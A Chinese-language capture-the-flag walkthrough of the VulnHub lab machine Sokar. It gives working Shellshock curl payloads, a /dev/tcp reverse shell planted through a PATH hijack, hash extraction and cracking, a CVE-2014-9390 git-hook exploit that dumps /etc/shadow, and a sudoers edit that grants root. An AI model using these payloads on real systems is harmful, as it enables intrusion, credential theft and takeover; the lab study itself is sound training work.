Sokar是Vulnhub在2015年第一次競賽中使用的機器,作者是Rasta Mouse
先用nmap掃瞄一遍目標機器,發現在591 port有架http server
Starting Nmap 6.46 ( http://nmap.org ) at 2015-01-01 09:57 EST
Nmap scan report for 192.168.2.154
Host is up (0.00058s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
591/tcp open http Apache httpd 2.2.15 ((CentOS))
MAC Address: 08:00:27:F2:40:DB (Cadmus Computer Systems)
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1187.08 seconds
連上 http://192.168.2.154:591 之後,首頁出現了這台機器的資訊,看起來是跑了date、uptime、netstat和iostat的結果
F5多刷幾次會發現這個狀態是每分鐘更新一次,猜測應該有用crontab跑排程
再看一下網頁原始碼,知道是跑這支cgi程式 http://192.168.2.154:591/cgi-bin/cat
對於再來要做甚麼有點沒頭緒,直接來試試去年很夯的Shellshock
root@kali:~/_Sec/sokar# curl -A "() { :; }; echo \"Content-type: text/plain\"; echo; echo; /bin/ls /home;" http://192.168.2.154:591/cgi-bin/cat
apophis
bynarr..隨便就矇中啦XD!寫個script讓操作可以輕鬆點
root@kali:~/_Sec/sokar# cat exp.sh
#!/bin/bash
shopt -s extglob
usr_bin='+(id|whoami|wget|uptime)' #執行檔的路徑要自己設定
while [ 1 -gt 0 ]
do
echo -n "[apache@sokar] " #假裝自己是個shell...
read cmd
prefix="/bin/"
bin=`echo $cmd | awk '{print $1}'`
case $bin in
$usr_bin)
prefix="/usr/bin/";;
esac
final_cmd=$prefix$cmd
line="() { :; }; echo \"Content-type: text/plain\"; echo; $final_cmd;"
curl -A "$line" http://192.168.2.154:591/cgi-bin/cat
done先來看看/cgi-bin/cat到底做了哪些事情
[apache@sokar] cat cat
#!/bin/bash
echo "Content-type: text/html";
echo ""
/bin/cat << EOM
<pre>
EOM
echo `date`
echo `uptime`
echo "<br />"
/bin/cat /tmp/stats
/bin/cat << EOM
</pre>
EOM他即時執行了date和uptime,看起來netstat和iostat的資訊就是排程執行後存在/tmp/stats裡面
[apache@sokar] cat /tmp/stats
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 192.168.2.154:36163 192.168.2.128:51242 CLOSE_WAIT
tcp 0 0 192.168.2.154:35913 192.168.2.128:51242 CLOSE_WAIT
tcp 0 0 192.168.2.154:36490 192.168.2.128:51242 CLOSE_WAIT
tcp 0 0 192.168.2.154:36186 192.168.2.128:51242 CLOSE_WAIT
tcp 0 0 192.168.2.154:36789 192.168.2.128:51242 CLOSE_WAIT
tcp 0 0 192.168.2.154:35907 192.168.2.128:51242 CLOSE_WAIT
tcp 0 0 :::591 :::* LISTEN
tcp 0 0 ::ffff:192.168.2.154:591 ::ffff:192.168.2.128:52364 TIME_WAIT
tcp 0 0 ::ffff:192.168.2.154:591 ::ffff:192.168.2.128:52363 TIME_WAIT
tcp 0 0 ::ffff:192.168.2.154:591 ::ffff:192.168.2.128:52367 TIME_WAIT
tcp 0 0 ::ffff:192.168.2.154:591 ::ffff:192.168.2.128:52366 TIME_WAIT
udp 0 0 0.0.0.0:68 0.0.0.0:*
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 9 [ ] DGRAM 8239 /dev/log
unix 2 [ ACC ] STREAM LISTENING 6863 @/com/ubuntu/upstart
unix 2 [ ] DGRAM 7006 @/org/kernel/udev/udevd
unix 2 [ ] DGRAM 49323
unix 2 [ ] DGRAM 37526
unix 2 [ ] DGRAM 36381
unix 2 [ ] DGRAM 26496
unix 2 [ ] DGRAM 26128
unix 2 [ ] DGRAM 9264
unix 2 [ ] DGRAM 8406
unix 3 [ ] DGRAM 7022
unix 3 [ ] DGRAM 7021
Linux 2.6.32-504.1.3.el6.x86_64 (sokar) 02/28/2015 _x86_64_ (1 CPU)
avg-cpu: %user %nice %system %iowait %steal %idle
39.39 0.00 29.65 0.04 0.00 30.92
Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn
sda 1.00 29.04 20.94 1922802 1386464
sdb 0.01 0.04 0.01 2710 754繼續找找這台機器上其他的資訊,找到了/var/spool/mail/bynarr,得到了bynarr的密碼”fruity”,並且知道bynarr可以連結外部的51242 port
[apache@sokar]: cat /var/spool/mail/bynarr
Return-Path: <root@sokar>
Delivered-To: bynarr@localhost
Received: from root by localhost
To: <bynarr@sokar>
Date: Thu, 13 Nov 2014 22:04:31 +0100
Subject: Welcome
Dear Bynarr. Welcome to Sokar Inc. Forensic Development Team.
A user account has been setup for you.
UID 500 (bynarr)
GID 500 (bynarr)
501 (forensic)
Password 'fruity'. Please change this ASAP.
Should you require, you've been granted outbound ephemeral port access on 51242, to transfer non-sensitive forensic dumps out for analysis.
All the best in your new role!
-Sokar-再研究一下bynarr的家目錄(/home/bynarr),會發現.bash_profile有一行
PATH=.:$PATH:$HOME/binbynarr的家目錄被設成PATH的第一順位
接下來嘗試看看能不能在家目錄用同名的程式來取代原本列出狀態用的程式(netstat和iostat)
[apache@sokar]: echo "#!/bin/bash" > /home/bynarr/netstat
[apache@sokar]: echo "echo netstat" >> /home/bynarr/netstat
[apache@sokar]: echo "#!/bin/bash" > /home/bynarr/iostat
[apache@sokar]: echo "echo iostat" >> /home/bynarr/iostat
[apache@sokar]: chmod +x /home/bynarr/netstat
[apache@sokar]: chmod +x /home/bynarr/iostat建完檔案等排程時間到了之後再重整一下首頁,就會發現iostat被替換成自己建立的偽‧iostat
再來就要靠這個偽‧iostat來取得bynarr的reverse shell
先在Kali上面監聽51242這個port後,再去修改一下/home/bynarr/iostat的內容
[apache@sokar] echo "!#/bin/bash" > /home/bynarr/iostat
[apache@sokar] echo "/bin/bash -i >& /dev/tcp/192.168.2.128/51242 0>&1" >> /home/bynarr/iostat等排程時間一到,就拿到bynarr的shell了
root@kali:~/_Sec/sokar# nc -lvp 51242
listening on [any] 51242 ...
192.168.2.154: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.2.128] from (UNKNOWN) [192.168.2.154] 36824
bash: no job control in this shell
[bynarr@sokar ~]$拿到bynarr的shell之後,先來看一下他有沒有sudo的權限
[bynarr@sokar ~]$ sudo -l
sudo -l
Matching Defaults entries for bynarr on this host:
!requiretty, visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User bynarr may run the following commands on this host:
(ALL) NOPASSWD: /home/bynarr/lime執行lime時可以選擇要掛載或卸除lime.ko的核心模組,這邊就直接掛載上去
[bynarr@sokar ~]$ sudo /home/bynarr/lime
sudo /home/bynarr/lime
==========================
Linux Memory Extractorator
==========================
LKM, add or remove?
> remove
[bynarr@sokar ~]$ sudo /home/bynarr/lime
sudo /home/bynarr/lime
==========================
Linux Memory Extractorator
==========================
LKM, add or remove?
> addlime掛載上去後,會把記憶體dump到/tmp/ram,而看起來/tmp/ram的內容還有一些可讀的字串
來看看能不能從這些字串中得到其他使用者的資訊
[bynarr@sokar tmp]$ strings ram | grep apophis
strings ram | grep apophis
apophis:$6$0HQCZwUJ$rYYSk9SeqtbKv3aEe3kz/RQdpcka8K.2NGpPveVrE5qpkgSLTtE.Hvg0egWYcaeTYau11ahsRAWRDdT8jPltH.:16434:0:99999:7:::
[bynarr@sokar tmp]$ strings ram | grep "root:"
strings ram | grep "root:"
root:$6$cWQYjirZ$rADNjUFSiHmYp.UVdt4WYlmALhMXdkg9//9yuodQ2TFfiEWlAO0J6PRKesEfvu.3dfDb.7gTGgl/jesvFWs7l0:16434:0:99999:7:::拿到了疑似密碼hash,餵給john解
root@kali:~/_Sec/sokar# john --wordlist=/usr/share/wordlists/rockyou.txt password
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt" Use the "--format=crypt"
option to force loading these as that type instead Loaded 2 password hashes with 2 different salts
(sha512crypt [64/64])
overdrive (apophis)接著來登入apophis
[bynarr@sokar ~]$ su apophis
su apophis
standard in must be a tty
[bynarr@sokar ~]$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
[bynarr@sokar ~]$ su apophis
su apophis
Password: overdrive
[apophis@sokar bynarr]$在apophis的家目錄裡面發現一個程式(build)。擁有者是root,而且設有sticky bit,看起來非常可疑,直接執行看看
[apophis@sokar ~]$ ./build
./build
Build? (Y/N) Y
Y
Cloning into '/mnt/secret-project'...
ssh: Could not resolve hostname sokar-dev: Name or service not known
fatal: Could not read from remote repository.
Please make sure you have the correct access rights
and the repository exists.拿去餵狗後會發現是git的錯誤訊息,主因是找不到sokar-dev這個hostname
想說能不能輕鬆改個/etc/hosts連回攻擊端,不過只有root有寫入權限,只好想想其他辦法
找半天終於找到/etc/resolv.conf有可寫的權限,看來是要自己架一個DNS server和git repository了
參考這個影片把DNS server架起來之後,因為不知道git要抓哪個路徑下的repository,先回sokar跑一次build看會不會再噴錯誤
[apophis@sokar ~]$ ./build
./build
Build? (Y/N) Y
Y
Cloning into '/mnt/secret-project'...
The authenticity of host 'sokar-dev (192.168.2.128)' can't be established.
RSA key fingerprint is d8:38:99:c5:d1:a1:ea:e7:48:cc:bc:d1:ad:bf:76:9c.
Are you sure you want to continue connecting (yes/no)? yes
yes
Warning: Permanently added 'sokar-dev,192.168.2.128' (RSA) to the list of known hosts.
root@sokar-dev's password: ###########
fatal: '/root/secret-project' does not appear to be a git repository
fatal: Could not read from remote repository.
Please make sure you have the correct access rights
and the repository exists.回Kali把repository建起來
mkdir /root/secret-project
cd /root/secret-project
git init從sokar再執行一次build就能成功clone repository了
[apophis@sokar ~]$ ./build
./build
Build? (Y/N) Y
Y
Cloning into '/mnt/secret-project'...
root@sokar-dev's password: ###########
warning: You appear to have cloned an empty repository.
Checking connectivity... done.做到這裡又卡住一陣子,最後靠google git exploit找到一個git的bug(CVE-2014-9390)
但是要運用這個bug的前提是:檔案系統不會區分大小寫(case insensitive)
先來看看/mnt/secret-project所在的檔案系統
[apophis@sokar secret-project]$ mount
mount
/dev/sda1 on / type ext4 (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
tmpfs on /dev/shm type tmpfs (rw)
/dev/sdb1 on /mnt type vfat (rw,uid=501,gid=502)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)vfat是case insensitive的系統! 接著就是實作的部分了!
先回Kali建個測試用的檔案
root@kali:~/secret-project# mkdir .GiT
root@kali:~/secret-project# cd .GiT/
root@kali:~/secret-project/.GiT# mkdir hooks
root@kali:~/secret-project/.GiT# cd hooks/
root@kali:~/secret-project/.GiT/hooks# cat post-checkout
#!/bin/bash
cat /etc/shadow將post-checkout設定成可執行後把新增的內容commit進repository
root@kali:~/secret-project/.GiT/hooks# chmod +x post-checkout
root@kali:~/secret-project/.GiT/hooks# cd ..
root@kali:~/secret-project/.GiT# cd ..
root@kali:~/secret-project# git add .GiT
root@kali:~/secret-project# git commit -m "CVE-2014-9390"
[master (root-commit) 7523455] CVE-2014-9390
Committer: root <root@localhost.localdomain>
Your name and email address were configured automatically based
on your username and hostname. Please check that they are accurate.
You can suppress this message by setting them explicitly:
git config --global user.name "Your Name"
git config --global user.email you@example.com
After doing this, you may fix the identity used for this commit with:
git commit --amend --reset-author
1 file changed, 2 insertions(+)
create mode 100755 .GiT/hooks/post-checkout回到sokar,把之前產生的repo砍掉後再跑一次build
[apophis@sokar ~]$ rm -rf /mnt/secret-project
rm -rf /mnt/secret-project
[apophis@sokar ~]$ ./build
./build
Build? (Y/N) Y
Y
Cloning into '/mnt/secret-project'...
root@sokar-dev's password: ##########
remote: Counting objects: 5, done.
remote: Total 5 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (5/5), done.
Checking connectivity... done.
root:$6$cWQYjirZ$rADNjUFSiHmYp.UVdt4WYlmALhMXdkg9//9yuodQ2TFfiEWlAO0J6PRKesEfvu.3dfDb.7gTGgl/jesvFWs7l0:16434:0:99999:7:::
bin:*:15628:0:99999:7:::
daemon:*:15628:0:99999:7:::
adm:*:15628:0:99999:7:::
lp:*:15628:0:99999:7:::
sync:*:15628:0:99999:7:::
shutdown:*:15628:0:99999:7:::
halt:*:15628:0:99999:7:::
mail:*:15628:0:99999:7:::
uucp:*:15628:0:99999:7:::
operator:*:15628:0:99999:7:::
games:*:15628:0:99999:7:::
gopher:*:15628:0:99999:7:::
ftp:*:15628:0:99999:7:::
nobody:*:15628:0:99999:7:::
vcsa:!!:16386::::::
saslauth:!!:16386::::::
postfix:!!:16386::::::
sshd:!!:16386::::::
bynarr:$6$UVZfMym7$9FFtl9Ky3ABFGErQlpQsKNOmAycJn4MlSRVHsSgVupDstQOifqqu3LvGwf3wmBvmfvh0IslwMo4/mhZ3qnVrM/:16434:0:99999:7:::
apache:!!:16386::::::
apophis:$6$0HQCZwUJ$rYYSk9SeqtbKv3aEe3kz/RQdpcka8K.2NGpPveVrE5qpkgSLTtE.Hvg0egWYcaeTYau11ahsRAWRDdT8jPltH.:16434:0:99999:7:::成功讀取到/etc/shadow!再來只要修改post-checkout的執行內容就能拿到root了
本來想說寫一個suid的程式讓post-checkout去編譯,寫到一半想到直接去改/etc/sudoers讓apophis得到全部的權限就可以了
echo "apophis ALL=(ALL:ALL) ALL" >> /etc/sudoers修改完post-checkout後再回到sokar重新build過之後就來試試嶄新的sudo
[apophis@sokar ~]$ sudo /bin/bash
sudo /bin/bash
[sudo] password for apophis: overdrive
[root@sokar apophis]# id
id
uid=0(root) gid=0(root) groups=0(root)
[root@sokar apophis]# cat /root/flag
cat /root/flag
0 0
| |
____|___|____
0 |~ ~ ~ ~ ~ ~| 0
| | Happy | |
___|__|___________|___|__
|/\/\/\/\/\/\/\/\/\/\/\/|
0 | B i r t h d a y | 0
| |/\/\/\/\/\/\/\/\/\/\/\/| |
_|___|_______________________|___|__
|/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/|
| |
| V u l n H u b ! ! |
| ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ |
|___________________________________|
=====================================
| Congratulations on beating Sokar! |
| |
| Massive shoutout to g0tmi1k and |
| the entire community which makes |
| VulnHub possible! |
| |
| rasta_mouse (@_RastaMouse) |
=====================================